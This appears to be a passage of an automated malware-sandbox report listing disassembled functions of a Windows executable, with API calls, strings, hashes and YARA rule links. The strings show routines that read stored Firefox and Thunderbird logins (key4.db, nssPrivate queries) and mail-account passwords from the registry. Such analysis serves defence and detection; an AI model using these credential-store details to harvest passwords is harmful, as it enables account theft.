                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                  • API String ID: 2814039832-2206097438
                                                                                                                  • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                  • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                  • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                  • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                  Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                  • memset.MSVCRT ref: 0040E5B8
                                                                                                                  • memset.MSVCRT ref: 0040E5CD
                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                  • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                  • memset.MSVCRT ref: 0040E6B5
                                                                                                                  • memset.MSVCRT ref: 0040E6CC
                                                                                                                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                    • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                  • memset.MSVCRT ref: 0040E736
                                                                                                                  • memset.MSVCRT ref: 0040E74F
                                                                                                                  • sprintf.MSVCRT ref: 0040E76D
                                                                                                                  • sprintf.MSVCRT ref: 0040E788
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                  • memset.MSVCRT ref: 0040E858
                                                                                                                  • sprintf.MSVCRT ref: 0040E873
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                  • API String ID: 4171719235-3943159138
                                                                                                                  • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                  • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                  • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                  • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                  Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                  • GetDC.USER32 ref: 004104E2
                                                                                                                  • strlen.MSVCRT ref: 00410522
                                                                                                                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                  • sprintf.MSVCRT ref: 00410640
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                  • API String ID: 1703216249-3046471546
                                                                                                                  • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                  • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                  • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                  • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                  Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004024F5
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,?,?,?,7618E430,?,00000000), ref: 00402533
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$QueryValuememset
                                                                                                                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                  • API String ID: 168965057-606283353
                                                                                                                  • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                  • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                  • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                  • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                  Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00402869
                                                                                                                    • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                  • _mbscpy.MSVCRT(?,?,7618E430,?,00000000), ref: 004028A3
                                                                                                                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7618E430,?,00000000), ref: 0040297B
                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                  • API String ID: 1497257669-167382505
                                                                                                                  • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                  • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                  • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                  • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                  Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                  • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                  • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                  • memset.MSVCRT ref: 0040FCFD
                                                                                                                  • memset.MSVCRT ref: 0040FD1D
                                                                                                                  • memset.MSVCRT ref: 0040FD3B
                                                                                                                  • memset.MSVCRT ref: 0040FD54
                                                                                                                  • memset.MSVCRT ref: 0040FD72
                                                                                                                  • memset.MSVCRT ref: 0040FD8B
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                  • memset.MSVCRT ref: 0040FE45
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                  • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                  • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                  • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                  Strings
                                                                                                                  • {Unknown}, xrefs: 0040FD02
                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                  • API String ID: 1428123949-3474136107
                                                                                                                  • Opcode ID: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                  • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                  • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                  • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                  Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                  • memset.MSVCRT ref: 0040128E
                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2998058495-0
                                                                                                                  • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                  • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                  Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                  • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                  • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                  • strlen.MSVCRT ref: 0040BEFE
                                                                                                                  • strlen.MSVCRT ref: 0040BF0C
                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                  • memset.MSVCRT ref: 0040BFDB
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                  • API String ID: 2303586283-933021314
                                                                                                                  • Opcode ID: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                  • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                                                                                  • Opcode Fuzzy Hash: ee83ce8392c91b6a1376ce061df6a688643c70b4fadf0565b78a002f471a3540
                                                                                                                  • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                                                                                  Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                  • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                  • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                  • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                  • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                  • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                  • API String ID: 231171946-2189169393
                                                                                                                  • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                  • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                  • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                  • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                  Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                  • API String ID: 633282248-1996832678
                                                                                                                  • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                  • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                  Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406782
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                  • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                  • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                  • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                  • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                  • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                  • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                  • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                  • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                  • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                  Strings
                                                                                                                  • , xrefs: 00406834
                                                                                                                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                  • key4.db, xrefs: 00406756
                                                                                                                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                  • API String ID: 3614188050-3983245814
                                                                                                                  • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                  • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                  • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                  • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
